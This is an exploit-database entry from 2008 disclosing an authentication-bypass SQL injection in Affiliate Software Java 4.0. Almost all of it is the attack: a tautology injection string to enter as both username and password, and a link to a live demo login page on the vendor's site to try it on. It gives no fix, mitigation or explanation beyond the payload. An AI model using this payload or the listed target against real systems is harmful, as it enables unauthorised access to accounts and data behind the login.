id: 4418
date: 12/11/2008
title: Affiliate Software Java 4.0 (Auth Bypass) SQL Injection Vulnerability
author: R3d-D3v!L
cves: 

=====================================================================
Affiliate Software Java 4.0 (Auth Bypass) SQL Injection Vulnerability
=====================================================================


[~] Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
   
 [~] Vendor: www.adserversolutions.com
   
 [?] Software: Affiliate Software Java 4.0
   
 [?] Date: 12.12.2008
   
 [?] contact: N/A
   
 [?] Exploit:
   
 ? username: r0' or ' 1=1--
 ? password: r0' or ' 1=1--
   
   
 [?]login 4 d3m0:
   
  http://www.adserversolutions.com/affiliate_java/logon.jsp
 
 [~]--------------------------------------------------------------------------------



#  0day.today [2023-03-24]  #